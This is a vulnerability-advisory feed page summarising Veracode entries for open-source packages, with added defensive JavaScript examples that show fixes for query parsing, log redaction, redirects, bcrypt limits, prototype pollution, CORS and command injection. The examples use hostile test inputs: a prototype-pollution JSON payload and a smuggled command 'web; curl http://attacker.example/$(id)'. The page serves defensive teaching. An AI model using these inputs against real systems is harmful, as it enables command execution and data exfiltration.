Veracode, recent entries: 38287 matches found

Veracode, added 2026/01/05 7:27 a.m.

Improper TLS Hostname Verification

org.apache.logging.log4j, log4j-core is vulnerable to improper TLS hostname verification. The vulnerability is due to the Socket Appender not enforcing TLS hostname verification even when explicitly enabled, which allows a man-in-the-middle attacker to intercept or redirect log traffic by...

CVSS 6.3, AI score 6.4, EPSS 0.00743
Exploits: 1, References: 11, Affected software: 1
Veracode, added 2026/01/05 7:27 a.m.

Insecure Deserialization

Apache NiFi is vulnerable to Insecure Deserialization. The vulnerability is due to the GetAsanaObject processor storing and retrieving state data using generic Java object deserialization without validation, allowing attackers with direct access to the configured Distributed Map Cache server ...

CVSS 8.8, AI score 7.7, EPSS 0.00435
Exploits: 0, References: 4, Affected software: 1
Veracode, added 2026/01/05 6:33 a.m.

Authentication Bypass

Signal K Server is vulnerable to Authentication Bypass. The vulnerability is due to unauthenticated exposure of WebSocket server events and access-request status endpoints, which allows an attacker to enumerate request IDs and poll their status to steal plaintext JWT tokens and fully hijack...

CVSS 9.1, AI score 7, EPSS 0.00492
Exploits: 1, References: 4, Affected software: 1
Veracode, added 2026/01/05 5:48 a.m.

Path Traversal

AdonisJS is vulnerable to Path Traversal. The vulnerability is due to improper validation of file paths during multipart file handling, which allows a remote attacker to write arbitrary files to arbitrary locations on the server filesystem...

CVSS 9.2, AI score 7.1, EPSS 0.01063
Exploits: 3, References: 6, Affected software: 1
Veracode, added 2026/01/02 5:31 p.m.

Remote Code Execution (RCE)

n8n is vulnerable to Remote Code Execution (RCE). The vulnerability is due to insufficient isolation in the Pyodide-based Python Code Node, which allows an authenticated attacker with workflow modification privileges to escape the sandbox and execute arbitrary commands on the host system running n8...

CVSS 9.9, AI score 6.1, EPSS 0.12685
Exploits: 4, References: 5, Affected software: 3
Veracode, added 2026/01/02 2:06 p.m.

Prototype Pollution

apidoc-core is vulnerable to Prototype Pollution. The vulnerability is due to improper handling of malformed data structures in the preProcess functions, which allows an attacker to manipulate JavaScript object prototypes via crafted properties such as define, leading to denial of service or...

CVSS 9.3, AI score 6.7, EPSS 0.00443
Exploits: 0, References: 2, Affected software: 1
Veracode, added 2026/01/02 1:36 p.m.

Improper Input Validation

qs is vulnerable to Improper Input Validation. The vulnerability is due to the arrayLimit option not being enforced for bracket notation parameters during query parsing, which allows an attacker to supply a large number of array elements and cause memory exhaustion via crafted HTTP requests...

CVSS 6.3, AI score 6.5, EPSS 0.0041
Exploits: 1, References: 3, Affected software: 1
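The qs entry above describes a limit that was applied to explicit indices (`a[5]=v`) but not to the append form (`a[]=v`). The following is an added example, not qs's code: a deliberately small query-string parser that counts every way of growing an array against one `arrayLimit`, and caps the number of pairs as a second line of defence. Nested keys such as `a[b][c]` are not handled; that is an assumption made to keep the parser short.

```javascript
// Added example (not qs's code): a minimal query-string parser that applies an
// arrayLimit to every way of growing an array, including the "a[]=v" append form.
// The attack it guards against: "a[]=1&a[]=2&...&a[]=N" with N large enough to
// exhaust memory, when the limit is only checked for explicit indices such as a[5].

function parseQuery(query, { arrayLimit = 20, maxPairs = 1000 } = {}) {
  const out = Object.create(null);          // no prototype: bracket keys cannot reach __proto__
  const pairs = query.replace(/^\?/, '').split('&').filter(Boolean);
  if (pairs.length > maxPairs) {
    throw new RangeError(`query has ${pairs.length} pairs, limit is ${maxPairs}`);
  }
  for (const pair of pairs) {
    const eq = pair.indexOf('=');
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawVal = eq === -1 ? '' : pair.slice(eq + 1);
    const key = decodeURIComponent(rawKey.replace(/\+/g, ' '));
    const val = decodeURIComponent(rawVal.replace(/\+/g, ' '));
    const m = /^([^[\]]+)\[(\d*)\]$/.exec(key);   // "name[]" or "name[123]" (no nesting, by assumption)
    if (!m) { out[key] = val; continue; }
    const [, name, index] = m;
    if (out[name] !== undefined && !Array.isArray(out[name])) {
      throw new TypeError(`${name} is used both as a scalar and as an array`);
    }
    const arr = out[name] ?? (out[name] = []);
    const i = index === '' ? arr.length : Number(index);   // append or explicit index
    if (i >= arrayLimit) {
      // Same decision for both notations: the array may not grow past the limit.
      throw new RangeError(`array ${name} would exceed arrayLimit=${arrayLimit}`);
    }
    arr[i] = val;
  }
  return out;
}

// Constructed request inputs: a normal query and a 500-element append flood.
const ok = parseQuery('ids[]=1&ids[]=2&ids[]=3&name=a+b');
const flood = 'ids[]=x&'.repeat(500).slice(0, -1);

function floodRejected() {
  try { parseQuery(flood, { arrayLimit: 20, maxPairs: 10000 }); return false; }
  catch (e) { return e instanceof RangeError; }
}
```

The point of the design is that the limit is checked on the resulting index, so it does not matter which syntax produced it; the `maxPairs` cap additionally bounds work before any allocation happens.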
Veracode, added 2026/01/02 8:51 a.m.

Command Injection

Serverless Framework is vulnerable to Command Injection. The vulnerability is due to unsanitized user input being passed to child_process.exec in the experimental MCP server feature, which allows an attacker to inject shell metacharacters and execute arbitrary system commands with the privileges o...

CVSS 7.5, AI score 7.5, EPSS 0.01944
Exploits: 2, References: 5, Affected software: 1
Veracode, added 2026/01/02 6:09 a.m.

Open Redirect

Koa is vulnerable to Open Redirect. The vulnerability is due to improper validation of the Referer header in the back redirect functionality, which allows an attacker to craft specially formed URLs treated as safe relative paths and force a user’s browser to redirect to an external, potentially...

CVSS 6.1, AI score 6.9, EPSS 0.00277
Exploits: 1, References: 4, Affected software: 1
Veracode, added 2025/12/31 10:32 a.m.

User Enumeration

ibexa/user is vulnerable to User Enumeration. The vulnerability is due to overly descriptive error messages, which allows an attacker to determine whether a user account exists by observing differences in error responses...

AI score 6.9
Exploits: 0
Veracode, added 2025/12/31 2:59 a.m.

Sensitive Information Exposure

@actual-app/sync-server is vulnerable to Sensitive Information Exposure. The vulnerability is due to logging parsed API responses to STDOUT using console.log/console.debug, which allows an attacker with access to application logs to obtain sensitive data such as bearer tokens, bank account detail...

AI score 6.8
Exploits: 0
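The fix for the class of bug above is to never hand a raw API response to a logger. The following is an added example, not code from @actual-app/sync-server: a redacting wrapper that strips values by field name and by value shape before anything reaches STDOUT. The field-name list and the two value patterns (bearer tokens, long digit runs for account numbers) are assumptions chosen for illustration.

```javascript
// Added example, not code from @actual-app/sync-server: a redacting logger for
// API responses. Assumptions: responses are plain JSON-like objects, and the
// sensitive material is recognisable by field name or by value shape.

const SENSITIVE_KEYS = /^(access_?token|refresh_?token|authorization|password|secret|iban|account(_?number)?)$/i;
const BEARER = /\bBearer\s+[A-Za-z0-9._~+/-]+=*/g;   // "Bearer <token>" inside free text
const LONG_DIGITS = /\b\d{8,}\b/g;                    // account / card numbers

function redact(value, key = '') {
  if (SENSITIVE_KEYS.test(key)) return '[REDACTED]';   // whole field, whatever its type
  if (typeof value === 'string') {
    return value.replace(BEARER, 'Bearer [REDACTED]').replace(LONG_DIGITS, '[REDACTED]');
  }
  if (Array.isArray(value)) return value.map((v) => redact(v));
  if (value && typeof value === 'object') {
    const out = {};
    for (const [k, v] of Object.entries(value)) out[k] = redact(v, k);
    return out;
  }
  return value;                                         // numbers, booleans, null
}

// Log only the redacted copy; returns it so callers (and tests) can inspect it.
function logResponse(label, body, sink = console.debug) {
  const safe = redact(body);
  sink(label, JSON.stringify(safe));
  return safe;
}

// Constructed sample response, shaped like what a bank-sync API might return.
const sample = {
  access_token: 'eyJhbGciOi.example.token',
  headers: { authorization: 'Bearer eyJhbGciOi.example.token' },
  accounts: [{ name: 'Checking', iban: 'GB33BUKB20201555555555', balance: 1234.5 }],
  note: 'retry with Bearer abc.def.ghi after 12345678901',
};
```

Redacting on the way into the logger, rather than relying on callers to remember, is what makes the property hold for every `console.debug` site at once.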
Veracode, added 2025/12/29 9:51 a.m.

Cross-site Scripting (XSS)

ibexa/admin-ui is vulnerable to cross-site scripting (XSS). The vulnerability is due to improper escaping of user-controlled input in image asset names, content language names, and future publishing within the back office, which allows an attacker with editor or administrator-level permissions to...

AI score 5.7
Exploits: 0
Veracode, added 2025/12/29 7:46 a.m.

Arbitrary File Write

github.com/git-lfs/git-lfs is vulnerable to arbitrary file write. The vulnerability is due to Git LFS not validating symbolic or hard links before writing files during git lfs checkout or git lfs pull, which allows an attacker to craft a malicious repository that causes Git LFS to write to...

CVSS 8.6, AI score 5.8, EPSS 0.00707
Exploits: 0, References: 8, Affected software: 1
Veracode, added 2025/12/26 10:16 a.m.

Remote Code Execution (RCE)

n8n is vulnerable to Remote Code Execution (RCE). The vulnerability is due to insufficient isolation in the workflow expression evaluation system, which allows an authenticated attacker to supply crafted expressions that are executed in the runtime context, enabling arbitrary code execution with th...

CVSS 9.9, AI score 8.2, EPSS 0.97875
Exploits: 29, References: 7, Affected software: 1
Veracode, added 2025/12/24 10:11 a.m.

Cross-Site Scripting (XSS)

ezsystems/ezplatform-admin-ui is vulnerable to Cross-Site Scripting (XSS). The vulnerability is due to improper escaping of user-controlled input in image asset names, content language names, and future publishing features, which allows an attacker with back-office editor or administrator privilege...

AI score 5.5
Exploits: 0
Veracode, added 2025/12/24 9:39 a.m.

Server-Side Request Forgery (SSRF)

@lobehub/chat is vulnerable to Server-Side Request Forgery (SSRF). The vulnerability is due to insufficient validation and restriction of user-supplied URLs in the tools.search.crawlPages tRPC endpoint, which allows an attacker with a valid token to supply arbitrary URLs and force the server to mak...

CVSS 3, AI score 5.8, EPSS 0.00294
Exploits: 0, References: 4, Affected software: 1
Veracode, added 2025/12/24 7:40 a.m.

Improper Authentication

github.com/mattermost/mattermost-server is vulnerable to improper authentication. The vulnerability is due to failure to validate email ownership during the Slack import process, which allows an attacker to create verified user accounts with arbitrary email domains and bypass email-based team...

CVSS 5.4, AI score 5.8, EPSS 0.00285
Exploits: 0, References: 6, Affected software: 2
Veracode, added 2025/12/24 7:28 a.m.

Improper Access Control

@strapi/core is vulnerable to improper access control. The vulnerability is due to improper sanitization of query parameters in the document service lookup operator, which allows an attacker to craft malicious queries to access private fields such as admin passwords and reset tokens...

CVSS 8.2, AI score 5.6, EPSS 0.00383
Exploits: 1, References: 3, Affected software: 1
Veracode, added 2025/12/23 4:47 p.m.

Deserialization Of Untrusted Data

Apache Causeway is vulnerable to Deserialization Of Untrusted Data. The vulnerability is due to unsafe Java deserialization of user-controllable URL parameters in ViewModel handling, which allows an authenticated attacker to execute arbitrary code with application privileges...

CVSS 6.3, AI score 7.9, EPSS 0.09442
Exploits: 0, References: 6, Affected software: 4
Veracode, added 2025/12/23 3:29 p.m.

Prototype Pollution

js-yaml is vulnerable to Prototype Pollution. The vulnerability is due to improper handling of special object properties such as __proto__ during YAML parsing, which allows an attacker to modify object prototypes and manipulate application behavior when untrusted YAML input is processed...

CVSS 5.3, AI score 7, EPSS 0.0037
Exploits: 0, References: 5, Affected software: 1
Veracode, added 2025/12/23 3:11 p.m.

Cross-site Scripting (XSS)

OWASP Java HTML Sanitizer is vulnerable to Cross-site Scripting (XSS). The vulnerability is due to improper sanitization when HtmlPolicyBuilder permits noscript and style tags with allowTextIn, which allows an attacker to craft malicious CSS or HTML payloads that bypass the defined policy and execu...

CVSS 8.6, AI score 6.9, EPSS 0.00226
Exploits: 1, References: 3, Affected software: 1
Veracode, added 2025/12/23 12:39 p.m.

Cross-site Request Forgery (CSRF)

Jenkins is vulnerable to Cross-site Request Forgery (CSRF). The vulnerability is due to missing or insufficient CSRF protection on login-related functionality, which allows an attacker to trick a victim into unknowingly authenticating into the attacker’s account...

CVSS 3.5, AI score 6.9, EPSS 0.00154
Exploits: 0, References: 3, Affected software: 1
Veracode, added 2025/12/23 12:30 p.m.

Improper Authentication

github.com/edgelesssys/contrast is vulnerable to Improper Authentication. The vulnerability is due to unauthenticated LUKS2 volume metadata and support for null key-encryption algorithms, which allows an attacker to craft a malicious volume that opens with any passphrase and captures all written...

AI score 5.6
Exploits: 0
Veracode, added 2025/12/23 11:38 a.m.

Sensitive Information Disclosure

Jenkins is vulnerable to Sensitive Information Disclosure. The vulnerability is due to build authorization tokens not being masked in the job configuration form, which allows an attacker who can view the configuration page to observe and capture these tokens...

CVSS 4.3, AI score 6.9, EPSS 0.00134
Exploits: 0, References: 3, Affected software: 1
Veracode, added 2025/12/23 11:21 a.m.

Sensitive Information Disclosure

Jenkins is vulnerable to Sensitive Information Disclosure. The vulnerability is due to build authorization tokens being stored unencrypted in job configuration files, which allows an attacker with extended read permissions or file system access to view and misuse these credentials...

CVSS 4.3, AI score 6.7, EPSS 0.00153
Exploits: 0, References: 3, Affected software: 1
Veracode, added 2025/12/23 10:42 a.m.

Missing Authorization

Jenkins is vulnerable to Missing Authorization. The vulnerability is due to a missing permission check on viewing encrypted credential data, which allows attackers with only View/Read permissions to access and view encrypted password values in views...

CVSS 4.3, AI score 6.9, EPSS 0.00208
Exploits: 0, References: 3, Affected software: 1
Veracode, added 2025/12/23 10:02 a.m.

Improper Access Control

github.com/bishopfox/sliver is vulnerable to Improper Access Control. The vulnerability is due to the custom WireGuard netstack not restricting traffic between connected clients, which allows an attacker with leaked or recovered keypairs to communicate with other implants, access exposed port...

CVSS 6.3, AI score 5.5, EPSS 0.00217
Exploits: 0, References: 6, Affected software: 1
Veracode, added 2025/12/23 9:49 a.m.

Server-side Request Forgery (SSRF)

Astro is vulnerable to server-side request forgery (SSRF). The vulnerability is due to improper image proxy domain validation, which allows an attacker to bypass restrictions using backslashes in the href parameter and trigger server-side requests to arbitrary URLs...

CVSS 7.2, AI score 5.8, EPSS 0.0032
Exploits: 1, References: 4, Affected software: 1
Veracode, added 2025/12/19 10:19 a.m.

Authentication Bypass

Node-SAML is vulnerable to an Authentication Bypass. The vulnerability is due to loading assertions from the unsigned original SAML response instead of the signature-verified data, allowing attackers to modify authentication details within a valid assertion, such as altering the username, and...

CVSS 9.3, AI score 6.8, EPSS 0.00405
Exploits: 0, References: 4, Affected software: 2
Veracode, added 2025/12/19 8:25 a.m.

Race Condition

com.okta.sdk, okta-sdk-api is vulnerable to a Race Condition. The vulnerability is due to concurrent use of the ApiClient class, where shared request state can cause response headers or status codes from one request to affect another, potentially leading to incorrect or unsafe API responses...

CVSS 8.4, AI score 6.6, EPSS 0.00181
Exploits: 0, References: 2, Affected software: 2
Veracode, added 2025/12/17 1:14 p.m.

Improper Path Handling

formio is vulnerable to improper path handling. The vulnerability is due to improper validation of crafted request paths, which allows an unauthenticated or unauthorized attacker to bypass API access controls and retrieve data from protected endpoints...

CVSS 8.7, AI score 7.1, EPSS 0.00287
Exploits: 0, References: 4, Affected software: 1
Veracode, added 2025/12/17 12:31 p.m.

Improper Authorization

github.com/mattermost/mattermost-server is vulnerable to Improper Authorization. The vulnerability is due to failure to verify whether a user has permission to join a Mattermost team when processing the original invite token, which allows an attacker to manipulate the RelayState parameter and joi...

CVSS 8.1, AI score 6.5, EPSS 0.00307
Exploits: 0, References: 5, Affected software: 2
Veracode, added 2025/12/17 12:21 p.m.

Regular Expression Denial Of Service (ReDoS)

Apache Traffic Control is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability is due to inefficiently handled regular expression patterns in the Traffic Router management interface, which allows an attacker with management access to supply malicious patterns and cause deni...

CVSS 7.5, AI score 5.8, EPSS 0.00672
Exploits: 0, References: 4, Affected software: 1
Veracode, added 2025/12/17 12:13 p.m.

Improper Neutralization Of Special Elements

ESAPI esapi-java-legacy is vulnerable to Improper Neutralization of Special Elements. The vulnerability is due to insufficient sanitization in the Encoder.encodeForSQL interface, where the SQL encoding logic fails to properly neutralize special characters, resulting in incomplete protection an...

CVSS 7.5, AI score 8, EPSS 0.004
Exploits: 1, References: 11, Affected software: 1
Veracode, added 2025/12/17 10:46 a.m.

Weak Password Hash Generation

xxl-job is vulnerable to Weak Password Hash Generation. The vulnerability is due to insufficient computational effort in the 'makeToken' function of 'IndexController.java', where an attacker can manipulate the token-generation logic to obtain a valid token, resulting in remote compromise...

CVSS 6.3, AI score 7, EPSS 0.0028
Exploits: 1, References: 6, Affected software: 2
Veracode, added 2025/12/17 7:41 a.m.

Regular Expression Denial Of Service (ReDoS)

Yarn is vulnerable to Regular Expression Denial Of Service (ReDoS). The vulnerability is due to improper handling of user-controlled options in the setOptions function, which allows a local attacker to supply crafted input that triggers excessive regular expression processing and causes a denial of...

CVSS 5.5, AI score 4.7, EPSS 0.00188
Exploits: 1, References: 5, Affected software: 1
Veracode, added 2025/12/17 7:07 a.m.

Unvalidated Redirect

NocoDB is vulnerable to an unvalidated redirect. The vulnerability is due to missing validation of the user-controlled continueAfterSignIn parameter in the login flow, which allows an attacker to redirect authenticated users to arbitrary external websites after login...

CVSS 7.1, AI score 5.7, EPSS 0.00269
Exploits: 1, References: 3, Affected software: 1
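The Koa entry (Referer-driven `back` redirect) and the NocoDB entry above (`continueAfterSignIn`) are the same check done wrong: deciding whether a redirect target stays on the site. The following is an added example, not code from Koa or NocoDB, of a target validator that resolves the candidate against the site origin with the WHATWG URL parser and accepts only a same-origin result, next to the naive "starts with a slash" test that both classes of bypass get past. The site origin `https://app.example` is an assumption.

```javascript
// Added example, not code from Koa or NocoDB. Assumed site origin: https://app.example.

// Returns a path (never a full URL) that is safe to send in a Location header,
// or the fallback when the candidate would leave the site.
function safeRedirectTarget(candidate, siteOrigin, fallback = '/') {
  if (typeof candidate !== 'string' || candidate.length === 0) return fallback;
  let url;
  try {
    url = new URL(candidate, siteOrigin);   // resolves relative paths against our origin
  } catch {
    return fallback;
  }
  // Same-origin is the only acceptable result. This rejects absolute URLs to
  // other hosts, scheme-relative "//evil", the backslash variant "/\evil"
  // (which browsers treat as "//evil"), and non-http schemes (origin "null").
  if (url.origin !== siteOrigin) return fallback;
  return url.pathname + url.search + url.hash;   // re-emit only the path part
}

// The naive check the entries warn against: "starts with one slash, so it is relative".
function naiveIsRelative(candidate) {
  return candidate.startsWith('/') && !candidate.startsWith('//');
}

const SITE = 'https://app.example';
```

Re-emitting `pathname + search + hash` rather than the original string also removes any userinfo or odd encoding the attacker placed in the candidate.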
Veracode, added 2025/12/17 6:49 a.m.

Improper Input Validation

sha.js is vulnerable to Improper Input Validation. The vulnerability is due to insufficient validation of input data, which allows an attacker to manipulate crafted inputs to influence how data is processed...

CVSS 9.1, AI score 6.5, EPSS 0.00651
Exploits: 2, References: 7, Affected software: 1
Veracode, added 2025/12/17 5:11 a.m.

Improper Input Validation

cipher-base is vulnerable to Improper Input Validation. The vulnerability is due to insufficient validation of input data, which allows an attacker to manipulate crafted inputs to alter processing behavior...

CVSS 9.1, AI score 5.5, EPSS 0.0047
Exploits: 1, References: 6, Affected software: 1
Veracode, added 2025/12/16 11:32 a.m.

Improper Password Length Validation

@strapi/core is vulnerable to improper password length validation. The vulnerability is due to not enforcing a maximum password length before hashing with bcryptjs, which silently truncates passwords to 72 bytes, allowing an attacker to authenticate using only the first 72 bytes of an overlong password...

CVSS 6.3, AI score 5.6, EPSS 0.00383
Exploits: 1, References: 3, Affected software: 1
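The following is an added example, not Strapi's code, of what the 72-byte limit means in practice and of the check that prevents it from mattering. It models bcrypt's input truncation at the byte level rather than calling a bcrypt library, so it runs without dependencies; the minimum length and the sample passwords are assumptions.

```javascript
// Added example, not Strapi's code. bcrypt (and bcryptjs) key on at most the first
// 72 bytes of the password; anything beyond is ignored. This models that truncation
// and shows the byte-based length check a registration or login path should perform.

const BCRYPT_MAX_BYTES = 72;

// What bcrypt actually hashes: the first 72 bytes of the UTF-8 encoding.
function bcryptEffectiveInput(password) {
  return Buffer.from(password, 'utf8').subarray(0, BCRYPT_MAX_BYTES);
}

// Two distinct passwords that bcrypt would treat as identical.
function collideUnderBcrypt(a, b) {
  return bcryptEffectiveInput(a).equals(bcryptEffectiveInput(b));
}

// The fix: measure bytes, not characters, and refuse before hashing. A character
// count is wrong because multi-byte characters reach the limit sooner.
function validatePasswordLength(password, { minBytes = 8, maxBytes = BCRYPT_MAX_BYTES } = {}) {
  const bytes = Buffer.byteLength(password, 'utf8');
  if (bytes < minBytes) return { ok: false, reason: 'too short' };
  if (bytes > maxBytes) return { ok: false, reason: `exceeds ${maxBytes} bytes (bcrypt limit)` };
  return { ok: true, bytes };
}

// Constructed inputs: a 72-byte ASCII prefix shared by two "different" passwords,
// and 60 two-byte characters (120 bytes) that a character-count check would accept.
const prefix = 'correct horse battery staple '.repeat(3).slice(0, 72);
const pw1 = prefix + 'tail-one';
const pw2 = prefix + 'TAIL-TWO';
const multibyte = 'é'.repeat(60);
```

An alternative some projects choose is to pre-hash with SHA-256 (or similar) before bcrypt so that longer passwords keep their full entropy; if that route is taken, the pre-hash must be applied identically at registration and login, and the length check here is still the simpler change.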
Veracode, added 2025/12/15 4:44 p.m.

Prototype Pollution

Vuetify is vulnerable to Prototype Pollution. The vulnerability is due to the internal mergeDeep utility merging user-supplied preset objects without proper safeguards, which allows an attacker to supply a crafted preset to pollute JavaScript object prototypes and potentially cause denial of...

CVSS 8.6, AI score 7, EPSS 0.00281
Exploits: 0, References: 5, Affected software: 1
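Three entries on this page (apidoc-core's preProcess handling, js-yaml's treatment of `__proto__` during parsing, and Vuetify's mergeDeep above) belong to the same family: attacker-controlled keys reach code that builds or merges objects without filtering the names that alias the prototype chain. The following is an added example, not code from any of those projects: a recursive merge in its vulnerable shape next to a hardened one, driven by a constructed payload of the kind a JSON or YAML parser would produce. The `mergeDeep` shapes are illustrative assumptions, not the projects' implementations.

```javascript
// Added example, not code from apidoc-core, js-yaml or Vuetify.

// Vulnerable shape: recursive merge with no key filtering. When the source has
// an own key named "__proto__", target["__proto__"] resolves to Object.prototype
// and the recursion writes the attacker's fields onto every object in the process.
function unsafeMergeDeep(target, source) {
  for (const key of Object.keys(source)) {
    const sv = source[key];
    if (sv && typeof sv === 'object' && !Array.isArray(sv)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      unsafeMergeDeep(target[key], sv);
    } else {
      target[key] = sv;
    }
  }
  return target;
}

// Hardened shape: refuse the three keys that reach the prototype chain, recurse
// only into the target's own plain objects, and create prototype-less containers.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMergeDeep(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;           // drop (or throw, to surface the attempt)
    const sv = source[key];
    if (sv && typeof sv === 'object' && !Array.isArray(sv)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      safeMergeDeep(target[key], sv);
    } else {
      target[key] = sv;
    }
  }
  return target;
}

// Constructed payload, as JSON.parse (and a YAML parser) would hand it over:
// "__proto__" is an own key of the parsed object, not its prototype.
const payload = JSON.parse('{"theme":{"dark":true},"__proto__":{"polluted":"yes"}}');

function demoUnsafe() {
  unsafeMergeDeep({}, payload);
  const leaked = ({}).polluted;          // an unrelated object now carries the field
  delete Object.prototype.polluted;      // undo the damage so the rest of the process is unaffected
  return leaked;
}

function demoSafe() {
  const merged = safeMergeDeep({}, payload);
  return { leaked: ({}).polluted, dark: merged.theme.dark };
}
```

Filtering the key names is the minimum; using `Object.create(null)` for anything built from untrusted input removes the prototype chain as a target altogether, and `Object.freeze(Object.prototype)` at startup is a further mitigation in processes that can tolerate it.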
Veracode, added 2025/12/15 7:15 a.m.

Cross-Origin Resource Sharing (CORS) Misconfiguration

@strapi/core is vulnerable to Cross-Origin Resource Sharing (CORS) Misconfiguration. The vulnerability is due to improper validation of the Origin header in default configurations, which allows an attacker to exploit this by hosting a malicious site on a different origin and sending credentialed...

CVSS 6.5, AI score 6.5, EPSS 0.00263
Exploits: 0, References: 4, Affected software: 1
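The following is an added example, not Strapi's code or configuration: the weak Origin handling the entry describes (reflecting whatever Origin arrived, with credentials) beside the corrected decision, written as a small function that returns the CORS response headers for a request. The allowlist contents are an assumption.

```javascript
// Added example, not Strapi's code. Assumption: a middleware that decides the
// CORS response headers from the request's Origin header.

// Weak setting: reflect any Origin and allow credentials. Any site a victim visits
// can then read authenticated responses with the victim's cookies attached.
function weakCorsHeaders(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Corrected: an explicit allowlist, exact origin match, credentials only for those
// origins, and Vary: Origin so a cache never serves one origin's headers to another.
const ALLOWED_ORIGINS = new Set(['https://admin.example.com', 'https://app.example.com']);

function corsHeaders(origin) {
  if (typeof origin !== 'string') return {};            // same-origin or non-browser request
  let parsed;
  try { parsed = new URL(origin); } catch { return {}; } // also covers the literal "null" origin
  // parsed.origin !== origin rejects anything that is not already a canonical origin
  // (trailing slash, path, uppercase host); the Set lookup rejects suffix/prefix tricks.
  if (parsed.origin !== origin || !ALLOWED_ORIGINS.has(parsed.origin)) {
    return { Vary: 'Origin' };                          // no ACAO header: the browser blocks the read
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}
```

Omitting the `Access-Control-Allow-Origin` header for a disallowed origin is the correct response; returning `*` would be rejected by browsers when credentials are involved, but it is better not to rely on that.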
Veracode, added 2025/12/15 5:47 a.m.

Cross-site Scripting (XSS)

Vuetify is vulnerable to Cross-site Scripting (XSS). The vulnerability is due to unsanitized HTML being assigned to the innerHTML of the VDatePicker title via the title-date-format property, which allows an attacker to inject and execute arbitrary JavaScript in the victim’s browser...

CVSS 6.3, AI score 5.9, EPSS 0.00163
Exploits: 0, References: 3, Affected software: 1
Veracode, added 2025/12/15 5:25 a.m.

Arbitrary Command Injection

mcp-server-kubernetes is vulnerable to Arbitrary Command Injection. The vulnerability is due to passing user-supplied command strings directly to shell execution (sh -c) without input validation, which allows an attacker to inject and execute arbitrary commands through crafted inputs or indirect...

CVSS 8.8, AI score 8.1, EPSS 0.01286
Exploits: 1, References: 5, Affected software: 1
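The Serverless Framework entry (input reaching `child_process.exec`) and the mcp-server-kubernetes entry above (input reaching `sh -c`) are the same bug: a caller-controlled string spliced into a command line that a shell interprets. The following is an added example, not code from either project, showing the vulnerable string-building shape beside the hardened one: validate the value against the grammar it must have, then pass it as a single argv element through `execFile`, which never involves a shell. The `kubectl get pod <name>` scenario and the DNS-1123 label pattern for Kubernetes object names are assumptions.

```javascript
// Added example, not code from Serverless Framework or mcp-server-kubernetes.
// Assumed scenario: a tool that runs "kubectl get pod <name>" with a caller-supplied name.

// Vulnerable shape: string concatenation that will be handed to a shell ("sh -c" / exec()).
// Every shell metacharacter in podName is interpreted.
function buildShellCommand(podName) {
  return `kubectl get pod ${podName}`;
}

// Hardened shape, step 1: an allowlist matching the grammar the value must have.
// Kubernetes object names are DNS-1123 labels (assumption stated in the lead-in).
const DNS_1123_LABEL = /^[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])?$/;

function buildArgv(podName) {
  if (!DNS_1123_LABEL.test(podName)) {
    throw new Error(`invalid pod name: ${JSON.stringify(podName)}`);
  }
  // Step 2: one argv element per token; no shell ever sees the string.
  return { file: 'kubectl', args: ['get', 'pod', podName] };
}

function runKubectl(podName) {
  const { file, args } = buildArgv(podName);
  const { execFileSync } = require('node:child_process');
  // execFile* spawns the program directly; argv elements reach kubectl verbatim.
  return execFileSync(file, args, { encoding: 'utf8', timeout: 10_000 });
}

function isRejected(podName) {
  try { buildArgv(podName); return false; } catch { return true; }
}

// Constructed attacker input: a "pod name" that ends the command and appends another.
const hostile = 'web; curl http://attacker.example/$(id)';
```

The allowlist also rejects a leading `-`, so the value cannot be turned into an unexpected flag for kubectl; where a value legitimately has no restrictive grammar, passing it after `--` (for tools that support it) or via stdin is the fallback, never a shell.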
Veracode, added 2025/12/13 11:01 a.m.

Denial Of Service (DoS)

react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack and next are vulnerable to Denial of Service (DoS). The vulnerability is due to insufficient patching of unsafe payload deserialization in React Server Components, where maliciously crafted HTTP requests sent to Server...

CVSS 7.5, AI score 6.7, EPSS 0.1888
Exploits: 3, References: 6, Affected software: 5
Veracode, added 2025/12/13 8:04 a.m.

Authentication Bypass

ruby-saml is vulnerable to authentication bypass. The vulnerability is due to improper handling of libxml2 canonicalization in Nokogiri when processing invalid XML, which returns an empty string used for DigestValue calculation, allowing an attacker to perform a Signature Wrapping attack and bypa...

CVSS 9.3, AI score 5.8, EPSS 0.00207
Exploits: 0, References: 4, Affected software: 1
Veracode, added 2025/12/13 8:03 a.m.

Remote Code Execution (RCE)

Fugue is vulnerable to Remote Code Execution (RCE). The vulnerability is due to unsafe deserialization in the FlaskRPCServer implementation, where the decode function uses cloudpickle.loads on untrusted data, allowing attackers to send malicious serialized objects that execute arbitrary code on the...

CVSS 8.8, AI score 6.3, EPSS 0.0067
Exploits: 1, References: 2, Affected software: 1
Veracode, added 2025/12/13 8:03 a.m.

Authentication Bypass

keylime is vulnerable to Authentication Bypass. The vulnerability is due to insufficient validation during agent registration, where a malicious actor can register a new agent with a different TPM while reusing an existing agent’s UUID, allowing the attacker to overwrite the legitimate agent...

CVSS 8.2, AI score 5.8, EPSS 0.0038
Exploits: 0, References: 11, Affected software: 1
Veracode, added 2025/12/13 8:03 a.m.

Improper Access Control

mad-proxy is vulnerable to Improper Access Control. The vulnerability is due to flaws in HTTP/HTTPS traffic interception logic, allowing attackers to bypass security policies and evade traffic inspection, potentially exposing sensitive data...

CVSS 5.3, AI score 5.8, EPSS 0.00208
Exploits: 0, References: 2, Affected software: 1
Veracode, added 2025/12/13 8:02 a.m.

Authentication Bypass

ruby-saml is vulnerable to authentication bypass. The vulnerability is due to inconsistent XML parsing between REXML and Nokogiri resulting in different document structures, which allows an attacker to perform a Signature Wrapping attack and bypass authentication...

CVSS 9.3, AI score 5.8, EPSS 0.00383
Exploits: 0, References: 5, Affected software: 1